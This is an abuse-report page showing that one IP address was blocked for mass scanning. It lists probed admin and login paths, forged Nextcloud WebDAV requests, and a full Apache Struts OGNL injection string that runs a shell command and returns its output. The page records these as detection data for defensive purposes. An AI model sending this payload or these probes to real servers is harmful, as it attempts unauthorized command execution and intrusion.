abuseip.org

IP 54.155.75.131 is currently blocked by the redirs.com anycast edge.

Reason: suspicious paths across 13 domains
Hits (last hour): 554
Unique targets hit: 14
Unique paths probed: 532
Detection count: 12
First seen: 2026-05-11 07:07:06 UTC
Last seen: 2026-05-11 07:20:46 UTC
Block expires: 2026-05-12 08:16:18 UTC

Sample paths probed

/axis2-admin/login
/remote.php/dav/files/admin?OC-Expires=991200&OC-Verb=PROPFIND&OC-Credential=admin&OC-Date=2026-05-11T07%3A18%3A01Z&OC-Signature=7de1310f3e6200e4169b19b66a16dcf1a43939046f7fe196784c0a0a444dd603
/?wcal_action=checkout_link&user_email=test&validate=uAN55biCAWoA1wwGb89NvwNiWkSX6drjKO5JyXu9FAqSn+XTDoo5E664+EUhhNa+JjbmhaCKTjg2w3k/
/?wcal_action=checkout_link&user_email=test&validate=qwFrXa+CAWrqoOLzN0t4TlPJiVl2FY1tX3b4bh17Dw/DQx0nEavj0WRKKI8lxDHap7a7tOrZ650=
/remote.php/dav/files/admin?OC-Expires=991200&OC-Verb=PROPFIND&OC-Credential=admin&OC-Date=2026-05-11T07%3A18%3A10Z&OC-Signature=b4af244d731a32b25f65a69296b8a16ba14649d62a95fd1a0a297511ab9442c0
/login
/users/auth/saml/callback
/?wcal_action=checkout_link&user_email=test&validate=GgPQfqiCAWoW3KcFXwNuDe4b9Su0xrFMe4VFrucgWZBf85UUWxWh508xusRCfaD9IQbQDXIVDcpQ91ZrmCEZ
/remote.php/dav/files/admin?OC-Expires=991200&OC-Verb=PROPFIND&OC-Credential=admin&OC-Date=2026-05-11T07%3A18%3A02Z&OC-Signature=533e576d156af73313b11675058fb7ef21213767c2fe7f0566aa5b73d516e295
/console/login/LoginForm.jsp
/axis2/axis2-admin/login
/cli?remoting=false
/
/remote.php/dav/files/admin?OC-Expires=991200&OC-Verb=PROPFIND&OC-Credential=admin&OC-Date=2026-05-11T07%3A18%3A02Z&OC-Signature=298d550137ca3485ce8824323afc56fb5ac3dfe659537c6b1cad940f25a990de
/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/lcms/index.php
/dana-na/auth/url_default/welcome.cgi
/cgi/logout
/?wcal_action=checkout_link&user_email=test&validate=pwGh8auCAWrZSEC7kzfgn1JaiZ1uXkqJ7x6wUsvk7U6rCh/6YgUcHONARfSkFA3hgJbUYoqGfzTf9YM=
/get_mech_list?version=3

Sample User-Agents

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.3 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64; rv:149.0) Gecko/20100101 Firefox/149.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36

What does this mean?

This address sent traffic that the redirs.com edge classified as automated abuse — typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).

If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.